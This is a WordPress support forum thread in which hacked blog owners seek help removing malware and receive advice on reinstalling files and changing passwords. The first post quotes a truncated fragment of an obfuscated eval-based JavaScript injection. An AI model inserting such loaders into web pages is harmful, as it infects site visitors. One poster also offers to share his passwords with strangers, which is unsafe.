WordPress.org

Support

Support » How-To and Troubleshooting » My blog is hacked and with malware!

My blog is hacked and with malware!

  • sinankurt

    @sinankurt

    Hello,

    i am from germany so sorry for my bad english.

    I actually saw on Google Chrome that my WordPress Blog (www.quartel.de) includes malware. I did everything to remove that malwares, but i actually dont know how.

    I donwloaded my whole WordPress-Content with Filezilla, but i dont know how and where to search for the viruses. Google says that it should like this:

    <script>var s=new String();try{document.getElementById(‘t3v2562v3r3’).innerHTML}catch(q){r=1;c=String;}if(r&&document.createTextNode)o=2;e=window.eval;m=Array(4.5*o,18/o,52.5*o,204/o,16*o,

    How can i find this malwares?

Viewing 15 replies - 1 through 15 (of 22 total)
  • Don’t try to search, replace all the wp files including plugins and theme files with a fresh copy, also change your wp password and also change it if used anywhere else (this is often how they get your wp password as it’s the same as your hacked commercial account using the same email address and password…you should take this time to update to the latest versions each plugin/theme and wp..if your database was compromised (the offending code may be in a table in the database), change the password (and make sure you update wp-config). If you cannot login to wordpress as admin, rename the index.php file to index.html and try then…a new index.php filed is created…this index.php file is in the root of your theme. The likely location for the offending code is in the wp_options table…manually editing the database is not for a novice. Good luck!

    sinankurt

    @sinankurt

    Thanks for the fast answer.

    I can normally log-in to my Blog as admin and use it, too. But i dont know what you mena with replace? I mean then are all my things in the past deleted, not? That would be really bad.

    I mean to use your ftp client to manually replace all wp files.

    WP settings are kept in the database, if your db is not what was hacked, you will be OK. You may lose any customizations done directly to wp files, like custom css, etc…these can be simply re-edited using the files you downloaded as a ref…if you made the changes, you should know what they are.

    rballin

    @rballin

    My site got hacked as well. Should I uninstall WP and then re-install it?

    Yes, that’s to make sure no files are infected with bad code. Please note to make sure to keep a copy of everything including a full backup of your database. Some say you can leave the wp-contents folder as is, but I am not convinced this folder cannot contain a hacked file as it is just as vulnerable as any one folder in wp to be hacked. I would do this manually via ftp as the admin scripts could be corrupt. And change those passwords you use.

    rballin

    @rballin

    I have a small issue…my hard drive crashed a few months ago and i didn’t save the theme I downloaded and apid for…is there any way I can save that before i delete everything?

    You can connect to your site with FTP and download the theme files – actually to properly back it up your should do this often, then back that up!

    sinankurt

    @sinankurt

    Yes, I downloaded all files from my blog for now. But what to do in the next step? Please help me, I don’t want that my blog gets blacklisted.

    rballin

    @rballin

    Ok so I deleted all the WP files then I uploaded a backup that I did this afternoon and my site looks as bare as the day I started it…what am I doing wrong??

    Before proceeding with a manual install/updates, it is important to review and understand all the related topics here:

    http://codex.wordpress.org/Installing_WordPress#Detailed_Instructions

    First you need to take inventory, then download what you need. Review the link above and make sure you fully understand it, then:

    Write down a list of the installed plugins and the theme. Each as they appear in the appropriate wp admin panel section will have links to the author and WordPress page for them. After confirming compatibility with the current WordPress version, Download the latest version, saving each to a common location. Once you have gathered the files you need, they need to be extracted. Once extracted, each will have a default folder name such as mythemev1.x, it is the whole folder inside that you need.

    Download WP 3.2.1 (make sure your host supports this version, it requires certain version of supporting programs/modules etc, like php. Extract files.

    The file sample-wp-config.php needs to be renamed to just wp-config and it needs to have the same data as your current wp-config.php (you can just copy the wp-config.php file but make sure it’s correct and does not have errant code). This step is very important to do right.

    Verify that your .htaccess file or web.config file (IIS7) is correct.

    Create a new folder called BlogNewFiles (or whatever). Move the wp files to that folder. Navigate to the wp-contents folder, then plugins and then theme folders and put the plugins and theme folders you extracted into them accordingly.

    Log back into site as admin and deactivate your theme and all plugins. This is very important to have the next steps work right.

    Next,open Notepad (ascii text editor – NOT Word of other rich text editor) and past this in and save the file as “.maintenance” (dot first, no extension, or quotes):

    <?php $upgrading = time(); ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <title>Maintenance</title>
    <style type="text/css">
    .style1 {
    	font-size: x-large;
    }
    .style2 {
    	font-size: large;
    }
    </style>
    </head>
    <body style="background-color: #008080">
    <h1>Briefly unavailable for scheduled maintenance. Check back soon.</h1>
    <h2>This site is currently in Maintenance Mode. What, you say? Occasionally,
    Wordpress needs to have core files updated, plug-ins updated, and then a short period
    for testing is required. Look back soon.</h2>
    <h2>Thanks!</h2>
    </body>
    </html>
    <?php die(); ?>

    (Above is an example and can be styled as you choose)

    Using cPanel or phpmyadmin (see your web host documentation on this), and make sure you are quite clear on the instructions to backup your database, then do so.

    Back to FTP now, (make really sure you have ALL your files downloaded, both old and new), then rename the folders:

    wp-admin
    wp-contents and
    wp-includes

    to

    xxx-wp-admin
    xxx-wp-contents and
    xxx-wp-includes

    (this saves the files on the servers…if your upgrade fails, remove the new files and rename those back)

    Then upload your new files and after remove the .maintenance file(or rename).

    Log into site, activate your theme, activate your plugins, and review the site for style and functionality.

    If it it was files that were hacked, this will fix it, if not then work needs to be done on the database (which may again in turn corrupt your files, so this part may have to be redone too).

    Please reply with any questions and especially if this helped.

    @rballin, did you upload the files in the root also, following the instructions above?

    rballin

    @rballin

    I honestly don’t understand any of this and I feel so screwed because I am now worse off than I was before.

    @rballin,

    Contact your webhost and see if they have any ‘snapshots’ of your files and database that precludes the problem. If not, you may need to hire someone.

    sinankurt

    @sinankurt

    I don’t understand, too. I want to hire someone from sucuri, but I don’t have a credit card. I am so demoralized, I don’t know what do now. I think my blog gets blacklistted, and do one….

    I would give somebody from here my wp password and my FTP password if he/she could fix that problem. Please, I am in a so big problem 🙁

    rballin

    @rballin

    @sinankurt I ended up calling my web host and had them reinstall my site from a few days before I got hacked. They were able to locate the malware for me and deleted everything. I had Google re-index it and everything is fine now. I would suggest doing that if you can’t afford to pay someone to help you.

Viewing 15 replies - 1 through 15 (of 22 total)
  • The topic ‘My blog is hacked and with malware!’ is closed to new replies.
Skip to toolbar